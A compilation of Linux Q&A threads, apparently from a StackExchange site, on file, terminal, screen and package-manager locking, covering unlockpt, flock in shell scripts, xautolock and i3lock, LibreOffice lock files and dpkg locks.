After having opened the master part of a pseude-terminal int fd_pseudo_term_master = open("/dev/ptmx",O_RDWR); there is the file /dev/pts/[NUMBER] created, representing the slave part of he pseudo-terminal. Ignorant persons, like me might imagine that after having done ptsname(fd_pseudo_term_master,filename_pseudo_term_slave,buflen); one should be set to simply do int fd_pseudo_term_slave = open(filename_pseudo_term_slave,O_RDWR); and be good. However there must be a very important use case of "locked" pseudo-terminal slaves, since to make stuff simple, before the open call can be made, it is made necessary to use man 3 unlockpt, to "unlock it". I was not able to find out what this use-case is? What is the need of the pseudo-terminal to be initially locked? What is achieved with code (taken from a libc) /* Unlock the slave pseudo terminal associated with the master pseudo terminal specified by FD. */ int unlockpt (int fd) { #ifdef TIOCSPTLCK int save_errno = errno; int unlock = 0; if (ioctl (fd, TIOCSPTLCK, &unlock)) { if (errno == EINVAL) { errno = save_errno; return 0; } else return -1; } #endif /* If we have no TIOCSPTLCK ioctl, all slave pseudo terminals are unlocked by default. */ return 0; }If possible an answer would detail a use-case, historical or current. Bonus part of the question would be: Do current linux kernels still rely on this functionality of "locked pseudo terminal slaves?" Idea: Is this an inefficient attempt to avoid racing contitions? Waiting for an answer I have looked more into the linux kernel source without having any good answer myself. However it appears that one use that can be "extraced" from an initial lockdown case of the pseudo-terminal is to provide some time for the pseudo-terminal-master process to setup some access rights to the file at /dev/pts/[NUMBER], as to prevent some user to access the file in the first place. Can this be part of the answer? Strangly then, however it appears that such "initial lockdown" state seems not really able to prevent multiple openings of the slave file anyway, at least to what I conceive to be guaranteed atomicity here.
Is pseudo terminals ( unlockpt / TIOCSPTLCK ) a security feature?
To answer part 1) then add the no-fork option to blurlock as below: exec --no-startup-id xautolock -time 5 -locker 'blurlock -n' -notify 15 -notifier "notify-send 'Screen will lock in 15 s'" -detectsleep -killtime 60 -killer "systemctl suspend"As blurlock is built on top of i3lock this will pass the following option (according to the i3lock man page):-n, --nofork Don't fork after starting.Which I find rather cryptic, and wouldn't have figured out myself if if not for a similar question on the Arch forum.
I'm using manjaro (5.8.18-1-MANJARO) and the i3 window manager. I'm trying to lock the screen then suspend activity after given amounts of idle time. I've found that xautolock should suit my needs using both the -locker and -killer flags. My i3 config contains the following : exec --no-startup-id xautolock -time 5 -locker blurlock -notify 15 -notifier "notify-send 'Screen will lock in 15 s'" -detectsleep -killtime 60 -killer "systemctl suspend" However, this doesn't seem to work:The locker part works fine, but system doesn't suspend after 60 minutes. If I suspend the system manually (I'm using a modified version of the i3exit script, the executed command is xautolock -locknow && systemctl suspend), then the system suspends again shortly after i resumed it. This behavior started very recently, I think after a system update, and I don't think I've changed anything else than the i3exit myself in system settings / config. I don't know what could be putting the system to sleep again since I don't have any power-manager activated to my knowledge.Thanks for your help !
Trying to use xautolock to suspend activity after a certain amount of time
I solved this by adding /etc/X11/xorg.conf.d/30-dpms.conf which contains: Section "ServerFlags" Option "StandbyTime" "90" Option "SuspendTime" "90" Option "OffTime" "90" Option "BlankTime" "90" EndSection90 stands for 90 minutes
I use arch with i3wm. I have enabled i3lock in my .config/i3/config: exec --no-startup-id xss-lock --transfer-sleep-lock -- i3lockProblem is my computer locks like every 10 minutes. How can I set two hours lock timeout ? This is my xset q output: Keyboard Control: auto repeat: on key click percent: 0 LED mask: 00000000 XKB indicators: 00: Caps Lock: off 01: Num Lock: off 02: Scroll Lock: off 03: Compose: off 04: Kana: off 05: Sleep: off 06: Suspend: off 07: Mute: off 08: Misc: off 09: Mail: off 10: Charging: off 11: Shift Lock: off 12: Group 2: off 13: Mouse Keys: off auto repeat delay: 660 repeat rate: 25 auto repeating keys: 00ffffffdffffbbf fadfffefffedffff 9fffffffffffffff fff7ffffffffffff bell percent: 50 bell pitch: 400 bell duration: 100 Pointer Control: acceleration: 2/1 threshold: 4 Screen Saver: prefer blanking: yes allow exposures: yes timeout: 600 cycle: 600 Colors: default colormap: 0x22 BlackPixel: 0x0 WhitePixel: 0xffffff Font Path: /usr/share/fonts/misc,/usr/share/fonts/TTF,/usr/share/fonts/OTF,/usr/share/fonts/100dpi,/usr/share/fonts/75dpi,built-ins DPMS (Energy Star): Standby: 600 Suspend: 600 Off: 600 DPMS is Enabled Monitor is On
Arch linux: i3wm set lock time out (xss-lock i3lock)
The leading dot hides the file from some directory listings. This comes from historical behavior of the ls command, which lead many programs to use leading dots to denote files that aren't meant to be visible in directory listings, which in turn lead to many file managers hiding such files by default. The tilde is an unusual character in file names, so there's not much risk of colliding the file name chosen by the user. Why a tilde? Tildes are especially unusual at the beginning of file names, because a leading ~ means “home directory” in shells and many other programs. So prepending a tilde is unlikely to cause a collision. A possible additional factor because when it's at the end of a file name, it's a traditional way to name backups, so adding a tilde to a file's name has a flavor of “some file that is related to this other file, but is not the one the user usually wants” (but it couldn't be at the end because that's already taken). The tilde may additionally have been inspired by the lock files used by Microsoft Office, which start with ~$. The hash at the end ensures that the file doesn't have an extension that other programs would recognize. If the file was called .~lock.MyDocument.odt, file managers would offer to open it in LibreOffice. Why a hash rather than some other character? Hash has a small tradition of being used in lock file names, for example Emacs uses .# followed by the name of the file that's being edited.
Whenever I open a LibreOffice document, LibreOffice creates a lock file along the original file. This file has a naming schema like the following: .~lock.MyDocument.odt# Is this a LibreOffice specific naming pattern? Is it common on Linux? Why do LibreOffice use exactly that pattern? Why did they choose those specific extra characters?
Lock file naming pattern
Alright, so.In a terminal, open /etc/default/grub. Find the line that starts with GRUB_CMDLINE_LINUX_DEFAULT=. Replace it with GRUB_CMDLINE_LINUX_DEFAULT="atkbd.reset i8042.reset i8042.nomux quiet splash". Save and exit the file. Run sudo update-grub.If this doesn't work, follow the same process but try GRUB_CMDLINE_LINUX_DEFAULT="i8042.direct i8042.dumbkbd" instead.
I have a Dell Latitude 5500 and a Dell Latitude 7550. The 5500 has Debian 10 and KDE, and the 7550 has Ubuntu 20.04 with KDE. In both laptops, if I close the lid, when I open it later the built-in laptop keyboard is completely locked-up and I can't type anything. The trackpad still works though and I am able to click on "switch user". When I do this and get prompted to login again, the laptop keyboard starts working again on both laptops. I'm not sure if this is an issue, but I have an external 10-port USB hub plugged into the laptops. I have an external keyboard and mouse plugged into them. The external keyboard also locks up, but the external mouse also works. Why would closing the laptop lid cause the keyboard to lock up? Is there anything I can do to fix it? dmesg output: [Sat Jun 26 10:46:51 2021] usb 2-1.4: Disable of device-initiated U1 failed. [Sat Jun 26 10:46:51 2021] usb 2-1.4: Disable of device-initiated U2 failed. [Sat Jun 26 10:46:51 2021] usb 2-1.4: reset SuperSpeed Gen 1 USB device number 5 using xhci_hcd [Sat Jun 26 10:46:52 2021] usb 2-1.4: reset SuperSpeed Gen 1 USB device number 5 using xhci_hcd [Sat Jun 26 23:15:15 2021] usb 2-1.4: Disable of device-initiated U1 failed. [Sat Jun 26 23:15:15 2021] usb 2-1.4: Disable of device-initiated U2 failed. [Sat Jun 26 23:15:15 2021] usb 2-1.4: reset SuperSpeed Gen 1 USB device number 5 using xhci_hcd [Sat Jun 26 23:15:16 2021] usb 2-1.4: reset SuperSpeed Gen 1 USB device number 5 using xhci_hcd [Mon Jun 28 01:54:59 2021] usb 2-1.4: Disable of device-initiated U1 failed. [Mon Jun 28 01:54:59 2021] usb 2-1.4: Disable of device-initiated U2 failed. [Mon Jun 28 01:54:59 2021] usb 2-1.4: reset SuperSpeed Gen 1 USB device number 5 using xhci_hcd [Mon Jun 28 01:54:59 2021] usb 2-1.4: reset SuperSpeed Gen 1 USB device number 5 using xhci_hcd [Mon Jun 28 07:34:57 2021] usb 2-1: USB disconnect, device number 2 [Mon Jun 28 07:34:57 2021] usb 2-1.3: USB disconnect, device number 4 [Mon Jun 28 07:34:57 2021] usb 2-1.4: USB disconnect, device number 5 [Mon Jun 28 07:34:57 2021] usb 1-1: USB disconnect, device number 2 [Mon Jun 28 07:34:57 2021] usb 1-1.2: USB disconnect, device number 4 [Mon Jun 28 07:34:57 2021] usb 1-1.3: USB disconnect, device number 6 [Mon Jun 28 07:34:57 2021] usb 1-1.3.2: USB disconnect, device number 8 [Mon Jun 28 07:34:57 2021] usb 1-1.3.4: USB disconnect, device number 9 [Mon Jun 28 07:34:57 2021] usb 1-1.4: USB disconnect, device number 7 [Mon Jun 28 07:35:06 2021] usb 1-1: new high-speed USB device number 10 using xhci_hcd [Mon Jun 28 07:35:06 2021] usb 1-1: New USB device found, idVendor=2109, idProduct=2812, bcdDevice=85.80 [Mon Jun 28 07:35:06 2021] usb 1-1: New USB device strings: Mfr=0, Product=1, SerialNumber=0 [Mon Jun 28 07:35:06 2021] usb 1-1: Product: USB2.0 Hub [Mon Jun 28 07:35:06 2021] hub 1-1:1.0: USB hub found [Mon Jun 28 07:35:06 2021] hub 1-1:1.0: 4 ports detected [Mon Jun 28 07:35:06 2021] usb 2-1: new SuperSpeed Gen 1 USB device number 11 using xhci_hcd [Mon Jun 28 07:35:06 2021] usb 2-1: New USB device found, idVendor=2109, idProduct=0812, bcdDevice=85.81 [Mon Jun 28 07:35:06 2021] usb 2-1: New USB device strings: Mfr=1, Product=2, SerialNumber=0 [Mon Jun 28 07:35:06 2021] usb 2-1: Product: USB3.0 Hub [Mon Jun 28 07:35:06 2021] usb 2-1: Manufacturer: VIA Labs, Inc. [Mon Jun 28 07:35:06 2021] hub 2-1:1.0: USB hub found [Mon Jun 28 07:35:06 2021] hub 2-1:1.0: 4 ports detected [Mon Jun 28 07:35:06 2021] usb 1-1.2: new full-speed USB device number 11 using xhci_hcd [Mon Jun 28 07:35:07 2021] usb 2-1.3: new SuperSpeed Gen 1 USB device number 12 using xhci_hcd [Mon Jun 28 07:35:07 2021] usb 2-1.3: New USB device found, idVendor=2109, idProduct=0812, bcdDevice=85.81 [Mon Jun 28 07:35:07 2021] usb 2-1.3: New USB device strings: Mfr=1, Product=2, SerialNumber=0 [Mon Jun 28 07:35:07 2021] usb 2-1.3: Product: USB3.0 Hub [Mon Jun 28 07:35:07 2021] usb 2-1.3: Manufacturer: VIA Labs, Inc. [Mon Jun 28 07:35:07 2021] hub 2-1.3:1.0: USB hub found [Mon Jun 28 07:35:07 2021] hub 2-1.3:1.0: 4 ports detected [Mon Jun 28 07:35:07 2021] usb 1-1.2: New USB device found, idVendor=046d, idProduct=0a8f, bcdDevice= 0.12 [Mon Jun 28 07:35:07 2021] usb 1-1.2: New USB device strings: Mfr=3, Product=1, SerialNumber=0 [Mon Jun 28 07:35:07 2021] usb 1-1.2: Product: Logitech USB Headset [Mon Jun 28 07:35:07 2021] usb 1-1.2: Manufacturer: Logitech USB Headset [Mon Jun 28 07:35:07 2021] usb 2-1.4: new SuperSpeed Gen 1 USB device number 13 using xhci_hcd [Mon Jun 28 07:35:07 2021] usb 2-1.4: New USB device found, idVendor=2109, idProduct=0812, bcdDevice=85.81 [Mon Jun 28 07:35:07 2021] usb 2-1.4: New USB device strings: Mfr=1, Product=2, SerialNumber=0 [Mon Jun 28 07:35:07 2021] usb 2-1.4: Product: USB3.0 Hub [Mon Jun 28 07:35:07 2021] usb 2-1.4: Manufacturer: VIA Labs, Inc. [Mon Jun 28 07:35:07 2021] hub 2-1.4:1.0: USB hub found [Mon Jun 28 07:35:07 2021] hub 2-1.4:1.0: 4 ports detected [Mon Jun 28 07:35:08 2021] input: Logitech USB Headset Logitech USB Headset as /devices/pci0000:00/0000:00:14.0/usb1/1-1/1-1.2/1-1.2:1.3/0003:046D:0A8F.0007/input/input34 [Mon Jun 28 07:35:08 2021] hid-generic 0003:046D:0A8F.0007: input,hidraw1: USB HID v1.11 Device [Logitech USB Headset Logitech USB Headset] on usb-0000:00:14.0-1.2/input3 [Mon Jun 28 07:35:08 2021] usb 1-1.3: new high-speed USB device number 12 using xhci_hcd [Mon Jun 28 07:35:08 2021] usb 1-1.3: New USB device found, idVendor=2109, idProduct=2812, bcdDevice=85.80 [Mon Jun 28 07:35:08 2021] usb 1-1.3: New USB device strings: Mfr=0, Product=1, SerialNumber=0 [Mon Jun 28 07:35:08 2021] usb 1-1.3: Product: USB2.0 Hub [Mon Jun 28 07:35:08 2021] hub 1-1.3:1.0: USB hub found [Mon Jun 28 07:35:08 2021] hub 1-1.3:1.0: 4 ports detected [Mon Jun 28 07:35:08 2021] usb 1-1.4: new high-speed USB device number 13 using xhci_hcd [Mon Jun 28 07:35:08 2021] usb 1-1.4: New USB device found, idVendor=2109, idProduct=2812, bcdDevice=85.80 [Mon Jun 28 07:35:08 2021] usb 1-1.4: New USB device strings: Mfr=0, Product=1, SerialNumber=0 [Mon Jun 28 07:35:08 2021] usb 1-1.4: Product: USB2.0 Hub [Mon Jun 28 07:35:08 2021] hub 1-1.4:1.0: USB hub found [Mon Jun 28 07:35:08 2021] hub 1-1.4:1.0: 4 ports detected [Mon Jun 28 07:35:08 2021] usb 1-1.3.2: new low-speed USB device number 14 using xhci_hcd [Mon Jun 28 07:35:09 2021] usb 1-1.3.2: New USB device found, idVendor=046d, idProduct=c00e, bcdDevice=11.10 [Mon Jun 28 07:35:09 2021] usb 1-1.3.2: New USB device strings: Mfr=1, Product=2, SerialNumber=0 [Mon Jun 28 07:35:09 2021] usb 1-1.3.2: Product: USB-PS/2 Optical Mouse [Mon Jun 28 07:35:09 2021] usb 1-1.3.2: Manufacturer: Logitech [Mon Jun 28 07:35:09 2021] input: Logitech USB-PS/2 Optical Mouse as /devices/pci0000:00/0000:00:14.0/usb1/1-1/1-1.3/1-1.3.2/1-1.3.2:1.0/0003:046D:C00E.0008/input/input35 [Mon Jun 28 07:35:09 2021] hid-generic 0003:046D:C00E.0008: input,hidraw2: USB HID v1.10 Mouse [Logitech USB-PS/2 Optical Mouse] on usb-0000:00:14.0-1.3.2/input0 [Mon Jun 28 07:35:09 2021] usb 1-1.3.4: new low-speed USB device number 15 using xhci_hcd [Mon Jun 28 07:35:09 2021] usb 1-1.3.4: New USB device found, idVendor=046d, idProduct=c31c, bcdDevice=64.02 [Mon Jun 28 07:35:09 2021] usb 1-1.3.4: New USB device strings: Mfr=1, Product=2, SerialNumber=0 [Mon Jun 28 07:35:09 2021] usb 1-1.3.4: Product: USB Keyboard [Mon Jun 28 07:35:09 2021] usb 1-1.3.4: Manufacturer: Logitech [Mon Jun 28 07:35:09 2021] input: Logitech USB Keyboard as /devices/pci0000:00/0000:00:14.0/usb1/1-1/1-1.3/1-1.3.4/1-1.3.4:1.0/0003:046D:C31C.0009/input/input36 [Mon Jun 28 07:35:09 2021] hid-generic 0003:046D:C31C.0009: input,hidraw3: USB HID v1.10 Keyboard [Logitech USB Keyboard] on usb-0000:00:14.0-1.3.4/input0 [Mon Jun 28 07:35:09 2021] input: Logitech USB Keyboard Consumer Control as /devices/pci0000:00/0000:00:14.0/usb1/1-1/1-1.3/1-1.3.4/1-1.3.4:1.1/0003:046D:C31C.000A/input/input37 [Mon Jun 28 07:35:09 2021] input: Logitech USB Keyboard System Control as /devices/pci0000:00/0000:00:14.0/usb1/1-1/1-1.3/1-1.3.4/1-1.3.4:1.1/0003:046D:C31C.000A/input/input38 [Mon Jun 28 07:35:09 2021] hid-generic 0003:046D:C31C.000A: input,hiddev0,hidraw4: USB HID v1.10 Device [Logitech USB Keyboard] on usb-0000:00:14.0-1.3.4/input1 [Mon Jun 28 07:35:25 2021] kscreen_backend[162047]: segfault at 10 ip 00007fdb6825df6b sp 00007ffd034223b0 error 4 in KSC_XRandR.so[7fdb68246000+1b000] [Mon Jun 28 07:35:25 2021] Code: 73 1c e8 58 97 fe ff 49 8b 3c 24 48 8d 73 14 e8 eb 96 fe ff 49 8b 3c 24 48 8d 73 24 e8 2e 93 fe ff e8 e9 b9 fe ff 49 8b 3c 24 <0f> b7 70 10 48 89 c5 e8 d9 92 fe ff 48 89 ef e8 e1 8f fe ff 4c 89Output of grep "GRUB_CMDLINE_LINUX_DEFAULT=" /etc/default/grub GRUB_CMDLINE_LINUX_DEFAULT="quiet splash"
laptop keyboard locks up after closing lid
While creating a lock can be done with the lockfile command or the flock system call or by creating a directory (which is an uninterupptable action) the second part is more tricky. If the lock exists - how do you determine, if the lock belongs to a still running process? The most common solution is to put the PID of the process into the lock-file. Before trying to create a lock you have to check if the lock-file already exists. If so, check if the PID matches a running process that resembles the process that should create the lock. If this is not the case, remove the lock and recreate it.
I want to write a long-running shell script so that only one copy could be run at a time. If the script crashes, I want a new invocation of the script not to be stopped by a lock from the crashed invocation. Is lockfile-* set of utils the right thing to use? Is there a chance of a race condition while using them in a script? Does --use-pid lift the 5-minutes limitation mentioned on the man page? My scripts run significantly longer. I use an Ubuntu 10.10 instance on Amazon EC2; no NFS or something like that.
Locking in a shell script
You can close the file descriptor where flock maintains the lock before running the program that you want to run unlocked. ( flock -n 9 || exit 120 … (exec 9>&-; tomcat &) ) 9>/var/run/my.lock
I have a bash deployment script that handles deploying updated code to a Tomcat instance on CentOS, however, both Chef and RunDeck may invoke the script, and since Chef runs periodically there is a chance of a collision. How do I prevent the deployment script from running twice concurrently? The standard answer looks to be to wrap the deploy logic in a flock. However, since the deploy restarts tomcat that isn't working -- the new java process inherits the lock and prevents any further deploy scripts from executing. Is there another way to prevent concurrent execution or a way to prevent flock inheritance?
Controlling bash script concurrency, flock inheritance
I think the best thing to is to ensure that process B only copies files which have been fully transferred by process A. One way to do this would be to use a combination of cp and mv in process A, since the mv process uses the rename system call (provided the files are on the same filesystem) which is atomic. This means that from the perspective of process B, the files appear in their fully formed state. One way to implement this would be to have a partial directory inside your /backup directory which is ignored by process B. For process A you could do something like: file="some_wal_file" cp pg_xlog/"$file" /backup/partial mv /backup/partial/"$file" /backupAnd for process B (using bash): shopt -s extglob scp /backup/!(partial) user@remote-machine:/backups/Although the program that you probably want to look into, both for process A and process B, is rsync. rsync creates partial files and atomically moves into place by default (although usually the partial files are hidden files rather than being in a specific directory). Rsync will also avoid transferring files that it doesn't need to and has a special delta algorithm for transferring only the relevant parts of files that need to be updated over the network (rsync must be installed in both locations, although transfers still go over ssh by default). Using rsync for process A: rsync -a --partial-dir=/backup/partial pg_xlog/some_wal_file /backup/For process B: rsync -a --exclude=/partial/ /backup/ user@remote-machine:/backups/
If process A copies files to some location loc and process B regularly copies the files from loc to some other location, can B read a file that is currently in the process of being copied to loc by A? I'm using Ubuntu Linux 12.04 if that's important.Background information: I want to continuously backup a PostgreSQL cluster. PostgreSQL provides WAL archiving for that. It works by having the database call a script that copies a completed WAL file to some backup location. I want another process to regularly copy the backed up WAL files to another server. If a WAL file is currently being copied by the database, can the second process still read the file without running into some EOF condition before the file is copied as a whole? In other words: Can I do the following with no synchronization between A and B? A B cp pg_xlog/some_wal_file /backup/ scp /backup/* user@remote-machine:/backups/
Can I safely read a file that is appended to by another process?
Unfortunately I cannot give you a straight answer but might guide you to it. Essentially you are looking for the place where Xfce stores its settings and then a way to change them (one setting actually, enable/disable screen lock) using commands, not clicking on the GUI settings. Xfce uses xconfd for settings. xfconf-query command should help find the right setting and change it. xfconf xfconf-query
Please, do NOT say how to lock screen, i know how to do it. How To enable/disable Lock Screen service from terminal? Looks it's using xflock4 for locking screen. I can enable or disable it in Screensaver preferences, but want to do it with keyboard button. I don't need shell script, just with which command I can enable or disable it. I Have Gentoo Linux, Xfce 4.16 Thank You!Thank You!
How To enable/disable "Lock Screen" setting from Linux terminal?
I used the following function in my script to accomplish this: getPIDLock () { if [ ! -e "$LockFile" ]; then return 0 # Not an error, but lsof will emit a lot of text if the file doesn't exist fi local PIDLock=$( lsof -F p "$1" | head -n 1 ) local strEcho='echo ${PID:1}' bash -c "PID=\"$PIDLock\";$strEcho;" # Assuming system has BASH, but not assuming that the default shell is BASH return 0 }This will emit a PID if the file in question has a lock on it; otherwise, it will emit a blank string. PID=$( getPIDLock "/path/to/pidfile" ) if [ -n $PID ]; then # Do your thing fi
I am trying to create a service wrapper (init.d script) around one of my favorite applications. The application creates both a PID and a lock file, and so I'm trying to use those to ensure that I can report accurate status of the application and prevent my service from starting multiple copies. Unfortunately, the application (or system) crashes from time to time, leaving the PID and lock files behind, so I can't just check for the existence of those files to determine if my application is running or not. The application does create a lock on the lock file, a POSIX WRITE lock, according to lslocks, but it seems that if I try to create a lock with flock -x -n "$file" echo dummy, the command succeeds, to my surprise. Deleting the file also succeeded (rm "$file"), as well as writing to it, which on a BTRFS system does make a small amount of sense, though doesn't make it any less aggravating. So, how can I query the file in such a way that I would know if the file has a lock (POSIX or FLOCK) on it or not?
Check and Test Lock from other Process
In a word, "no" :-) Linux tar will not stop any other process from reading the files while it is running. If you are concerned about writing the tar doesn't block that either, but if a file changes while tar is reading it then you'll get a warning message; if the directory structure changes while tar is in the middle of it then you might see some oddities in the results (missing files, duplicated files on both paths, etc). So reads are perfectly safe, writes may require a little more care.
I have a large (>10GB) folder full of images on a live webserver that I need to back up and transfer. I'm worried that if I tar the folder, the files will be blocked for reading by the webserver, which is hitting the files many times per second. Does the tar command in linux block the files it's working on from being read?
Does linux tar block write access to files
There is no file locking mechanism in place to protect file renaming or deletion because there is no need for it. Renaming or even deleting a file while it is open by another process, even if it actively writes and/or reads data, is harmless. The processes having the file open would see no difference and will access the original data of the renamed file transparently, and even access a "deleted" file too without noticing the file has been deleted. The actual deletion will only happen when that process exits.
I have a cron job that kicks off a new process every day. The process runs every 5 minutes and appends to a log file. Another cron job runs every 60 minutes. It takes some of the data in the log file, cleans it up, creates a new log file. This cleaned up log file gets imported into a database. MySQL prevents duplicate entries so the first few lines of each new clean log file gets ignored. At the end of a day, I'm stuck with 24 cleaned up log files and one raw log file. If I was to run the clean-up script by first renaming the file to pre-process, do what I need to do, then delete it, would it cause any issues with my first cron script that is logging to the same file every 5 minutes? My fear is that the original log file is being written to and this other cron task is trying to rename it. OS: Debian 8 Edit: Interesting. Cron will write to the renamed file.
Does linux have file locking protection when trying to rename/deleting files
In Parted Magic 2013.08.01, right click an empty spot on Desktop and select Lock Screen password = partedmagic
Is it possible to lock the Parted Magic screen so that others don't tamper with it while it's in the middle of long operations?
Lock Parted Magic?
I haven't checked that you will get what you want with it, but the first thing I'd try is the audit subsystem. Make sure that the auditd daemon is started, then use auditctl to configure what you want to log. For ordinary filesystem accesses, you would do auditctl -w /path/to/directory auditctl -a exit,always -S fnctl -S open -S flock -F dir=/path/to/directoryThe -S option can be used to restrict the logging to specific syscalls. The logs appear in /var/log/audit/audit.log on Debian, and probably on Fedora as well. If you do know which process(es) may lock the file, then consider running strace on these processes (and only looking at the file-related system calls, or further restricting to specific syscalls). strace -s9999 -o foo.strace -e file foo
I'm quite new to Linux and I have not really a clue on how to do this. I've got a directory and I'd like to monitor (output to shell) when a file inside that directory get's a file lock and when it is released. It would be okay to know as well other things, like when a file is created and similar, but I'm mainly interested about the locks. I don't need to know which process does the lock, it's more about the order in which this happens. I'm pretty sure some tool for this exists (I already installed dtrace but after --help I decided to ask a question here). Any pointers warm-heartedly appreciated. I'm running a fedora 14 box if that matters.
How to trace file locks (per directory)
This simple script does the trick: #!/bin/shcase "$1" in hibernate|suspend) /usr/bin/vlock -ans & ;; thaw|resume) ;; *) exit $NA ;; esac
In X I've used the following script (from here) to lock the computer with i3lock each time pm-suspend or pm-hibernate are invoked. /etc/pm/sleep.d/00screensaver-lock: #!/bin/sh # 00screensaver-lock: lock workstation on hibernate or suspend username=andreas userhome=/home/$username export XAUTHORITY="$userhome/.Xauthority" export DISPLAY=":0" case "$1" in hibernate|suspend) su $username -c "/usr/bin/i3lock & ;; thaw|resume) ;; *) exit $NA ;; esacNow I'm in the process of setting up a console-only laptop (a minimal Debian install without the X server installed.) I've tried using the above script on that machine to lock my session using vlock. (That is: I've switched out i3lock with vlock in the version of the script I'm using on the console machine.) I've also tried commenting out the two lines starting with export XAUTHORITY and export DISPLAY=":0" as they are X specific. The script doesn't work on the no-X machine. How should I call vlock each time the computer suspends/hibernates?
Locking console when computer suspends/hibernates
fcntl(57, F_SETLK, …) means that the process is trying to take a lock on the file which is open on file descriptor 57. The error EGAIN means that taking the lock failed because it's already taken by another process. The lock is specifically on the portion of the file from offset 1073741824 to offset 1073741825. On Linux, you can use lslocks to see what locks are being held. To find who has the lock that Apache is waiting for, you'll need to know what file it's on; lsof -p $pid will tell you what file is open on fd 57. Assuming that the process needs the lock to continue, it will not be responsive until whichever other process that has the lock releases it. The problem is not that a resource is not available and needs to be created, but that an existing resource is currently busy.
When I use straceon Apache while it acts unresponsive, I get the following output: [pid 13704] fcntl(57, F_SETLK, {type=F_RDLCK, whence=SEEK_SET, start=1073741824, len=1}) = -1 EAGAIN (Resource temporarily unavailable)What does it mean and what kind of lock would the process need to be responsive again?
Meaning of fcntl ... F_SETLK ... (Resource temporarily unavailable) in strace output?
I was having the same problem some years ago due to a GUI widget that was looking for system updates and which was locking the package manager. You can maybe verify running GUI applications (including widget, systray) to be sure that no one related to package management is opened.
I'm not able to install, update or do anything else with apt-get, aptitude, dpkg and so on. The lock-file /var/lib/dpkg/lock exists from boot-time on. When I delete it and run apt-get update, it prints out, that dpkg has been interrupted. I tried dpkg --configure -a as mentioned in the help text, but that runs into a problem with gconf2: root@andre-ubuntu:/home/andre# dpkg --configure -a Setting up libbonoboui2-0:amd64 (2.24.5-0ubuntu2) ... Setting up libgnomeui-0:amd64 (2.24.5-2ubuntu3) ... Processing triggers for libc-bin ... ldconfig deferred processing now taking place Setting up gconf2 (3.2.6-0ubuntu1) ...(gconftool-2:16760): GConf-WARNING **: Client failed to connect to the D-BUS daemon: Did not receive a reply. Possible causes include: the remote application did not send a reply, the message bus security policy blocked the reply, the reply timeout expired, or the network connection was broken.dpkg stops at this point and i can't even interrupt it with Ctrl+C. I have the following version of Ubuntu: Linux andre-ubuntu 3.8.0-19-generic #30-Ubuntu SMP Wed May 1 16:35:23 UTC 2013 x86_64 x86_64 x86_64 GNU/LinuxDo you have any ideas what to do?
Can't install anything
Your script seems good enough. There are just some improvements needed: #!/bin/bash shopt -s nullglob for fd in "/proc/$$/fd/"*; do fd=${fd##*/} case "$fd" in 0|1|2|255) ;; *) eval "exec $fd>&-" ;; esac done exec "$@"nullglob prevents the pattern from presenting itself if no file is found. Globbing or filename expansion with the help of ${v##pat} parameter substitution method is enough. Using ls is not needed. You can just use "$@" to represent all arguments passed unto the script.The script is guaranteed to run without any external dependency so it's as good as running a binary.
I have some script using flock executable. It works well. Problem is when this script calls another script, and it creates background process. In this situation background process inherits file locked file handle, this is system behavior. I'm looking for any tool that works as wrapper and close all unneeded handles, specially for with file locks. In my idea only main process shoud be protected against running twice. I know this is untypical sytuation. Usually all children should finish for leaving file lock, but in this situation this does not work. At now I use some workaround, using some wrapper with main code above, but I'd preffer use some binary wrapper. code: #!/bin/bash for fd in $(ls /proc/$$/fd); do case "$fd" in 0|1|2|255) ;; *) eval "exec $fd>&-" ;; esac done exec $1 $2 $3 $4 $5 $6 $7 $8 $9
Remove unneeded file lock in script
The cron job is treating /var/cache/etckeeper/packagelist.pre-install as evidence that an installation is being processed, so it shouldn’t archive anything just yet. That file isn’t supposed to be a lock file, but the cron job is using it as a substitute. However I wouldn’t particularly worry about etckeeper and any lock files it has or hasn’t. If you want a consistent backup of an etckeeper managed tree, use the VCS’s features (but don’t forget any ignored files). The dpkg locks are documented (albeit briefly) as public interfaces in frontend.txt (/usr/share/doc/dpkg-dev/frontend.txt in dpkg-dev).
Context: Want to put a lock on etckeeper/apt hook activity during special backup. Objective is to preserve whole package integrity, e.g., wait until any package installation is complete, and then prevent new installation from starting until special backup is complete. Found shell script under cron which appears to be attempting to a lock on /var/cache/etckeeper/packagelist.pre-installbut actually it is not performed atomically and so it is flawed. I presume the cron shell script is part of Ubuntu 16.04 installation, not a part of etckeeper release. Flawed lock code shown below. Searched for etckeeper documentation about use of /var/cache/etckeeper/packagelist.pre-install as lock file. Found no documentation. But did find a piece of script file which writes to /var/cache/etckeeper/packagelist.pre-install without treating it as a lock file. At this time I am presuming that /var/cache/etckeeper/packagelist.pre-install is not intended to serve as a lock file interface for etckeeper. Etckeeper internal script not treating /var/cache/etckeeper/packagelist.pre-install as a lock file shown below. Question 1: Is there (and if so where is) documentation on etckeeper locking mechanism, or a developers portal to issue a requestion for clarification? There are plenty of questions and much discussion on stackexchange sites about the use of /var/lib/apt/lists/lock (we call it apt lock below)and /var/lib/dpkg/lock (we call it dpkg lock below)as locks for apt and dpkg respectively. All of the communications are concerned with stuck locks, how to diagnose them, and how to unstick them. However, I kind find no references to official apt and dpkg documentation specifying those lock files use as a formal interface. Question 2: Is there (and if so where is) documentation on apt lock mechanism and/or dpkg lock mechanism as public interfaces? Flawed lock attempt shell script, probably provided by Ubuntu 16.04: $ sudo cat /etc/cron.daily/etckeeper #!/bin/sh set -e if [ -x /usr/bin/etckeeper ] && [ -e /etc/etckeeper/etckeeper.conf ]; then . /etc/etckeeper/etckeeper.conf if [ "$AVOID_DAILY_AUTOCOMMITS" != "1" ]; then # avoid autocommit if an install run is in progress lockfile=/var/cache/etckeeper/packagelist.pre-install if [ -e "$lockfile" ] && [ -n "$(find "$lockfile" -mtime +1)" ]; then rm -f "$lockfile" # stale fi if [ ! -e "$lockfile" ]; then AVOID_SPECIAL_FILE_WARNING=1 export AVOID_SPECIAL_FILE_WARNING if etckeeper unclean; then etckeeper commit "daily autocommit" >/dev/null fi fi fi fiEtckeeper internal shell scipt writing to packagelist.pre-install and not treating it as a lock - hence I don't think it was intended as a lock interface. $ sudo cat /etc/etckeeper/pre-install.d/10packagelist #!/bin/sh # This list will be later used when committing. mkdir -p /var/cache/etckeeper/ etckeeper list-installed > /var/cache/etckeeper/packagelist.pre-install etckeeper list-installed fmt > /var/cache/etckeeper/packagelist.fmt
Where is official documentation about locking mechanisms for etckeeper, apt, and/or dpkg?
